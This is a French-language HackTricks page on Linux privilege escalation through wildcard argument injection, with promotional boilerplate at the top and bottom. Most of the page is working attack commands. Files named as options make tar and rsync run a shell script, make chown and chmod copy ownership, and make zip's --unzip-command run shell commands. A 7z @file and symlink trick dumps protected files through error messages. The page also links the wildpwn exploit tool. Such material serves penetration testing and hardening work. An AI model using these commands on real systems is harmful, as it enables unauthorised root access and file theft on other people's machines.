hacktricks/linux-hardening/privilege-escalation/wildcards-spare-tricks.md

5 KiB

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks:

chown, chmod

Vous pouvez indiquer quel propriétaire de fichier et quelles autorisations vous souhaitez copier pour le reste des fichiers

touch "--reference=/my/own/path/filename"

Vous pouvez exploiter ceci en utilisant https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (attaque combinée)
Plus d'informations sur https://www.exploit-db.com/papers/33930

Tar

Exécuter des commandes arbitraires:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Vous pouvez exploiter cela en utilisant https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (attaque tar)
Plus d'informations sur https://www.exploit-db.com/papers/33930

Rsync

Exécuter des commandes arbitraires:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

Vous pouvez exploiter cela en utilisant https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (attaque rsync)
Plus d'informations sur https://www.exploit-db.com/papers/33930

7z

Dans 7z, même en utilisant -- avant * (notez que -- signifie que l'entrée suivante ne peut pas être traitée comme des paramètres, donc juste des chemins de fichiers dans ce cas), vous pouvez provoquer une erreur arbitraire pour lire un fichier, donc si une commande comme celle-ci est exécutée par root:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

Et vous pouvez créer des fichiers dans le dossier où cela est exécuté, vous pourriez créer le fichier @root.txt et le fichier root.txt étant un lien symbolique vers le fichier que vous souhaitez lire:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Ensuite, lorsque 7z est exécuté, il traitera root.txt comme un fichier contenant la liste des fichiers qu'il doit compresser (c'est ce que l'existence de @root.txt indique) et lorsque 7z lit root.txt, il lira /file/you/want/to/read et comme le contenu de ce fichier n'est pas une liste de fichiers, une erreur sera générée affichant le contenu.

Pour plus d'informations, consultez les Write-ups de la box CTF de HackTheBox.

Zip

Exécuter des commandes arbitraires:

zip name.zip files -T --unzip-command "sh -c whoami"
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!

Autres façons de soutenir HackTricks: